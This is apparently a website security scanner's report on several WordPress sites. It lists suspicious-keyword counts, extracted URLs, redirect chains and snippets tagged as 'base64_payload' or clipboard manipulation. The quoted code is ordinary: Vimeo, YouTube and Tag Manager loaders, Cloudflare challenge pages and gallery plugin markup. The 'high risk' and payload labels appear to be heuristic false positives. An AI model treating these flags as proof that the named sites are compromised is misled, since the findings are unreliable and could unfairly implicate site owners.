!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.vttjs=a()}}(function(){return function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…
Status: ok
<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><meta http-equiv="content-security-policy" content="default-src &#39;none&#39;; script-src &#39;nonce-Dmx9kPha6SSCHvYj6s2YLN&#39; &#39;unsafe-eval&#39; https://challenges.cloudflare.com; script-s... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.videolan.org/x264.html
 ftypmp42isomiso2avc1mp41freemdatEH, #x264 - core 142 r2479 dd79a61 - H.264/MPEG-4 AVC codec - Copyleft 2003-2014 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=2…
Status: ok
    <!DOCTYPE html>
    <html lang="en" >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
        
        <meta name="Author" content="VideoLAN" />
        <meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, m... [truncated]
1
base64
4
suspicious keywords
1
high risk

πŸ” Suspicious Keywords 4

robot
Robot
hidden
XMLHTTP

🌐 Extracted URLs 91

https://ogp.me/ns#
https://104.199.248.167/
https://104.199.248.167/
https://104.199.248.167/wp-content/uploads/2020/08/mlogo.png
https://104.199.248.167/wp-content/uploads/2020/08/mlogo.png
2
base64
1
redirects
1
redirect chains
1
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 157

https://yoast.com/product/yoast-seo-premium-wordpress/
https://devblog.ezeelogin.com/
https://devblog.ezeelogin.com/feed/
https://devblog.ezeelogin.com/comments/feed/
https://devblog.ezeelogin.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.1.5

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://devblog.ezeelogin.com/wp-content/themes/startnext/assets/js/jquery.smartify.js?ver=6.9.4
Type: base64_payload
Destination (first appearance): https://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"><g transform="translate(0,-1051.3622)" /></svg>

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: base64_payload
Chain: http://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns="http://www.w3.org/2000/svg" width="1" height="1"><g transform="translate(0,-1051.3622)" /></svg>
Status: ok
<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><meta http-equiv="content-security-policy" content="default-src &#39;none&#39;; script-src &#39;nonce-khua9Sf6wvFqBz9rES6kLB&#39; &#39;unsafe-eval&#39; https://challenges.cloudflare.com; script-s... [truncated]
18
base64
1
redirects
3
redirect chains
4
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 286

https://ogp.me/ns#
https://gmpg.org/xfn/11
https://rankmath.com/
https://fudgeshop.com.au/
https://fudgeshop.com.au/

πŸ” External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://fudgeshop.com.au/wp-content/plugins/smart-slider-3/Public/SmartSlider3/Application/Frontend/Assets/dist/smartslider-frontend.min.js?ver=a019cc0d
Type: script_src
Destination (first appearance): https://player.vimeo.com/api/player.js
.ready=function(t){i||(i=new Promise((function(t){var i=c("script");i.onload=t,i.src="https://player.vimeo.com/api/player.js",n.head.appendChild(i)}))),i.then(t)},t.prototype.initVimeoPlayer=function(){var t=c("iframe");t.className="intrins…
Script: https://fudgeshop.com.au/wp-content/plugins/smart-slider-3/Public/SmartSlider3/Application/Frontend/Assets/dist/smartslider-frontend.min.js?ver=a019cc0d
Type: script_src
Destination (first appearance): https://player.vimeo.com/video/
e",t.allow="fullscreen; autoplay; encrypted-media",t.id=this.playerId+"-frame",t.src="https://player.vimeo.com/video/"+this.parameters.vimeocode+"?autoplay=0&_video&title="+this.parameters.title+"&byline="+this.parameters.byline+"&backgroun…

πŸ›°οΈ Redirect Follower Findings (4)

Source: inline_js
Method: script_src
yTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MP
Status: ok
<!DOCTYPE html>
<html lang=en>
  <meta charset=utf-8>
  <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width">
  <title>Error 400 (Bad Request)!!1</title>
  <style>
    *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px ... [truncated]
Source: external_js
Method: script_src
.ready=function(t){i||(i=new Promise((function(t){var i=c("script");i.onload=t,i.src="https://player.vimeo.com/api/player.js",n.head.appendChild(i)}))),i.then(t)},t.prototype.initVimeoPlayer=function(){var t=c("iframe");t.className="intrins…
Status: ok
/*! @vimeo/player v2.30.3 | (c) 2026 Vimeo | MIT License | https://github.com/vimeo/player.js */
((e,t)=>{"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):((e="undefined"!=typeof globalThis?globalThis:e||self).Vimeo=e.Vimeo||{},e.Vimeo.Player=t())})(this,function(){var e="undefined"!=typeof global&&"[object global]"==={}.toString.call(global),t="undefined"!=typeof Bun,r="undefined"!=typeof Deno,n="function"==typeof WebSocketP... [truncated]
Source: external_js
Method: script_src
e",t.allow="fullscreen; autoplay; encrypted-media",t.id=this.playerId+"-frame",t.src="https://player.vimeo.com/video/"+this.parameters.vimeocode+"?autoplay=0&_video&title="+this.parameters.title+"&byline="+this.parameters.byline+"&backgroun…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Sorry</title>
<style>
    body, html {
        width: 100%;
        height: 100%;
        margin: 0;
        padding: 0;
        background-color: #151515;
        overflow: hidden;
    }

    body {
        text-align: center;
        font-family: 'Helvetica Neue', 'Helvetica', 'Arial', sans-serif;
        color: white;
    }

	#horizon {
        display: table;
        height: 100%;
        position: static;
        width: 1... [truncated]
Source: external_js
Method: script_src
ction(){i.YT!==h&&i.YT.loaded?t():r(s,100)})()})),i.YT===h)){var s=c("script");s.src="https://www.youtube.com/iframe_api",n.head.appendChild(s)}o.then(t)},t.prototype.fadeOutCover=function(){this.coverFadedOut===h&&this.cover&&(this.coverFa…
Status: ok
var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/8456c9de\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};
if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.pus... [truncated]
7
base64
1
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 79

https://gmpg.org/xfn/11
https://44.208.147.17/feed/
https://44.208.147.17/comments/feed/
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F&#038;format=xml
1
clipboard
8
base64
1
redirects
7
suspicious keywords

πŸ” Suspicious Keywords 7

captcha_link_
CAPTCHA
captcha
captcha_site_key
robot
Robot
hidden

🌐 Extracted URLs 131

https://capazmente.com/feed/
https://capazmente.com/comments/feed/
https://capazmente.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcapazmente.com%2F
https://capazmente.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fcapazmente.com%2F&#038;format=xml
https://capazmente.com/wp-content/plugins/tainacan/assets/css/tainacan-gutenberg-block-common-theme-styles.css

πŸ“‹ Clipboard Manipulation Code

Showing first 1 of 1 entries (truncated for performance)

...ty:0.8;" onclick="wppaOvlOnclick(event)" onwheel="return false;" onscroll="return false;"><div id="wppa-ovl-dbg-msg" style="position:fixed;top:0;left:0;padding:0 4px;background-color:white;color:black"></div></div><div id="wppa-overlay-ic" onwheel="return false;" onscroll="return false;"></div><div id="wppa-overlay-pc" onwheel="return false;" onscroll="return false;"></div><div id="wppa-overlay-fpc" onwheel="return false;" onscroll="return false;"></div><div id="wppa-overlay-zpc" onwheel="return false;" onscroll="return false;"></div><img id="wppa-pre-prev" style="position:fixed;left:0;top:50%;width:100px;visibility:hidden" class="wppa-preload wppa-ovl-preload"><img id="wppa-pre-next" style="position:fixed;right:0;top:50%;width:100px;visibility:hidden" class="wppa-preload wppa-ovl-preload"><img id="wppa-pre-curr" style="position:fixed;left:0;top:0;visibility:hidden" class="wppa-preload-curr wppa-ovl-preload"><svg id="wppa-ovl-spin" class="wppa-spinner uil-default" width="120px" height="120px" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid" stroke="" style="width:120px; height:120px; position:fixed; top:50%; margin-top:-60px; left:50%; margin-left:-60px; opacity:1; display:none; fill:#999999; background-color:transparent; border-radius:24px;"><rect x="0" y="0" width="100" height="100" fill="none" class="bk"></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(0 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(22.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.09375s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(45 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.1875s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(67.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.28125s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(90 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.375s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(112.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.46875s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(135 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.5625s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(157.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.65625s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(180 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.75s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(202.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.84375s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(225 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="0.9375s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(247.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="1.03125s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(270 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="1.125s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(292.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="1.21875s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(315 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="1.3125s" repeatCount="indefinite" ></rect><rect class="wppa-ajaxspin" x="47" y="40" width="6" height="20" rx="3" ry="3" transform="rotate(337.5 50 50) translate(0 -32)"><animate attributeName="opacity" from="1" to="0" dur="1.5s" begin="1.40625s" repeatCount="indefinite" ></rect></svg>'); jQuery("body").append('<input type="hidden" id="wppa-nonce" name="wppa-nonce" value="c7284b019f" ><input type="hidden" id="wppa-qr-nonce" name="wppa-qr-nonce" value="f51da150e8" >'); //# sourceURL=wppa-js-after /* ]]> */ </script> <script type="text/javascript" src="https://capazmente.com/wp-includes/js/underscore.min.js?ver=1.13.7" id="underscore-js"></script> <script type="text/javascript" id="tainacan-blocks-common-scripts-js-extra"> /* <![CDATA[ */ var tainacan_blocks = {"wp_version":"6.9.4","root":"https://capazmente.com/wp-json/tainacan/v2","nonce":"","base_url":"https://capazmente.com/wp-content/plugins/tainacan","api_max_items_per_page":"96","admin_url":"https://capazmente.com/wp-admin/admin.php","site_url":"https://capazmente.com","theme_items_list_url":"https://capazmente.com/elementos","collections_post_types":{"tnc_col_527_item":"Haciendas de Valles Centrales de Oaxaca","tnc_col_86_item":"Tala de bosques"},"registered_view_modes":{"mosaic-legacy":{"label":"Mosaic","description":"A simple and marginless mosaic of item thumbnails.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-mosaic.php","component":"view-mode-mosaic-legacy","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\" viewBox=\"-2 -2 48 48\"\u003E\u003Cpath d=\"M24.981 7.464H4.898c-.758 0-1.372.615-1.372 1.373v14.816c0 .758.615 1.373 1.372 1.373h20.084c.758 0 1.373-.615 1.373-1.373V8.838c0-.76-.615-1.374-1.374-1.374zM29.183 15.527h7.927c.758 0 1.373-.615 1.373-1.374h-.001V8.838c0-.76-.614-1.373-1.373-1.373h-7.926c-.757 0-1.372.614-1.372 1.373v5.315c0 .76.615 1.374 1.372 1.374zM38.482 18.336c0-.758-.614-1.373-1.373-1.373h-7.926c-.757 0-1.372.615-1.372 1.373v5.317c0 .758.615 1.373 1.372 1.373h7.927c.758 0 1.373-.615 1.373-1.373h-.001zM38.481 27.847c0-.759-.613-1.373-1.373-1.373h-7.925c-.757 0-1.373.614-1.373 1.373v5.316c0 .758.616 1.373 1.373 1.373h7.927c.758 0 1.373-.615 1.373-1.373h-.002zM24.962 26.473h-7.926c-.758 0-1.373.615-1.373 1.373v5.316c0 .759.615 1.373 1.373 1.373h7.926c.759 0 1.373-.614 1.373-1.373v-5.315c0-.759-.613-1.374-1.373-1.374zM12.815 26.473H4.89c-.758 0-1.373.615-1.373 1.373v5.316c0 .759.615 1.373 1.373 1.373h7.925c.76 0 1.374-.614 1.374-1.373v-5.315c0-.759-.615-1.374-1.374-1.374z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"frame":{"label":"Frame","description":"A centered aligned, framed thumbnails view, like gallery expositions.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-frame.php","component":"view-mode-frame","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\"\u003E\u003Cpath d=\"M4.188 21.65h15.624a.103.103 0 00.103-.104V2.454a.103.103 0 00-.103-.103H4.188a.103.103 0 00-.103.103v19.092c0 .057.046.103.103.103zm1.394-1.518V3.848h12.837v16.284z\"/\u003E\u003Cpath d=\"M15.921 6.242H8.079a.103.103 0 00-.103.103v11.29c0 .057.046.104.103.104h7.842a.103.103 0 00.104-.104V6.345a.103.103 0 00-.104-.103z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"exhibition":{"label":"Exhibition","description":"A framed record view, where image and metadata are expanded on hover.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-exhibition.php","component":"view-mode-exhibition","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\"\u003E\u003Cpath d=\"M5.761 5.138h12.42v7.43H5.762z\"/\u003E\u003Cpath d=\"M20.28 2.869H3.72v16.787h-.794v1.475h2.892v-1.475h-.794v-4.82h4.14v.85h-.567v1.815h6.806v-1.815h-.567v-.85h4.14v4.82h-.794v1.475h2.892v-1.475h-.794zM14.27 15.686H9.73v-.85h4.538zm4.99-1.985H4.741V4.003h14.462v9.698z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"books":{"label":"Books","description":"A book cover view, made for library visualizations.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-books.php","component":"view-mode-books","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\"\u003E\u003Cpath d=\"M16.062 4.569l-7.1-1.244c-.073-.019-.146-.019-.219-.019a1.3 1.3 0 00-.933.385L6.163 5.337a.914.914 0 00-.256.64v12.187c0 .513.366.952.878 1.043l8.454 1.482a.409.409 0 00.457-.402V8.357a1.2 1.2 0 00-1.006-1.19L7.9 5.96a.492.492 0 01-.256-.842l.805-.805a.432.432 0 01.293-.128h.073l7.1 1.244c.75.128 1.28.787 1.28 1.537v11.692c0 .22.257.311.403.165l.11-.11c.238-.238.384-.585.384-.933V6.984a2.486 2.486 0 00-2.03-2.415z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"polaroid":{"label":"Polaroid","description":"A framed picture view, similar to polaroid photographs.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-polaroid.php","component":"view-mode-polaroid","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 23.362 24\" width=\"24\" height=\"24\"\u003E\u003Cpath d=\"M1.657 22.298h13.769V5.692H1.657zm.942-15.47h11.885v11.664H2.599z\"/\u003E\u003Cpath d=\"M8.02 1.702L7.627 5.25h.948l.257-2.314 11.813 1.313-1.29 11.593-3.531-.393v3.83l4.047.45 1.835-16.504z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"document":{"label":"Document","description":"Records with stacked papers style, for displaying published research.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-document.php","component":"view-mode-document","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\" version=\"1.0\"\u003E\u003Cpath d=\"M5.148 17.717l-1.554-.462 1.858-6.176zM18.92 5.638l.784.233-.938 3.118zM8.156 1.938l4.51 1.34-4.855-.192zM12.736 21.243l2.335.092-.181.603-2.269-.674-4.34.798L5.339 5.25 17.463 3.02l2.943 16.813zM6.534 4.575l.05-1.08 4.796.19zM7.44 20.021l-1.94-.076.4-8.719z\"/\u003E\u003Cpath d=\"M18.09 21.183l-2.296-.09 2.32-.427zM18.588 4.373l-.104 2.27-.4-2.29z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"albums":{"label":"Albums","description":"Thumbnails displayed as album covers with a disk inside.","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/plugins/tainacan-extra-view-modes/templates/view-mode-albums.php","component":"view-mode-albums","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci\u003E\u003Csvg fill=\"var(--tainacan-info-color, #505253)\" xmlns=\"http://www.w3.org/2000/svg\" height=\"24\" width=\"24\" data-name=\"Layer 2\"\u003E\u003Cpath d=\"M2.745 3.963a1.02 1.02 0 00-1.02 1.02v14.034a1.02 1.02 0 001.02 1.02h12.413a1.02 1.02 0 001.02-1.02V4.983a1.02 1.02 0 00-1.02-1.02zm9.58 2.886l.035 7.623h-.006c-.028.695-.445 1.024-1.063 1.23-.751.248-1.512.096-1.695-.464-.183-.56.286-1.229 1.027-1.478a1.855 1.855 0 01.623-.1v-2.643L7.313 12.36v3.144s0 .023.014.037c.185.572-.286 1.212-1.026 1.46-.74.25-1.512 0-1.695-.571-.183-.572.286-1.223 1.026-1.472a1.895 1.895 0 01.571-.111V8.9zM22.275 11.97a7.135 7.135 0 01-4.688 6.665v-4.656a2.032 2.032 0 000-3.993V5.32a7.1 7.1 0 014.673 6.65z\"/\u003E\u003Cpath d=\"M10.937 8.899v1.2l-3.45 1.18v-1.23z\"/\u003E\u003C/svg\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":false,"skeleton_template":"","placeholder_template":"","requires_thumbnail":true},"grid":{"label":"Miniatura","description":"Una vista de cuadr\u00edcula de miniaturas, que muestra solo el t\u00edtulo y la miniatura","type":"template","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-grid.php","component":"view-mode-grid","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewminiature tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":false,"implements_skeleton":false,"skeleton_template":"\u003Cdiv class=\"tainacan-grid-container\"\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\t\u003Cdiv class=\"skeleton tainacan-grid-item\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\t\u003C/div\u003E","placeholder_template":"","requires_thumbnail":true},"table":{"label":"Tabla","description":"The classic table display.","type":"component","template":"/home/u694151090/domains/capazmente.com/public_html/wp-content/themes/tainacan-interface/tainacan/view-mode-table.php","component":"view-mode-table","thumbnail":"","icon":"\u003Cspan class=\"icon\"\u003E\u003Ci class=\"tainacan-icon tainacan-icon-viewtable tainacan-icon-1-25em\"\u003E\u003C/i\u003E\u003C/span\u003E","show_pagination":true,"full_screen":false,"dynamic_metadata":true,"implements_skeleton":true,"skeleton_template":"","placeholder_template":"\u003Cul style=\"list-style: none;width: 100%; height: auto; display: flex; flex-direction: column; overflow-x: auto;padding: 0;\"\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray1, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 60px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 90px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 100px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\u003C/li\u003E\u003Cli style=\"display: flex; align-items: center; flex-direction: row; flex-wrap: nowrap; gap: 15px; width: 100%; height: 40px; background-color: var(--tainacan-block-gray0, #f2f2f2); padding: 2px 6px;\"\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"flex-shrink: 0; width: 32px; height: 32px; background-color: var(--tainacan-block-gray2, #dbdbdb);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 180px; height: 10px; background-color: var(--tainacan-block-gray3, #a5a5a5);\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 120px; height: 6px; background-color: var(--tainacan-block-gray3, #a5a5a5);\"\u003E\u003C/div\u003E\n\t\t\t\t\t\t\u003Cdiv style=\"width: 70px; height: 6px; background-color: 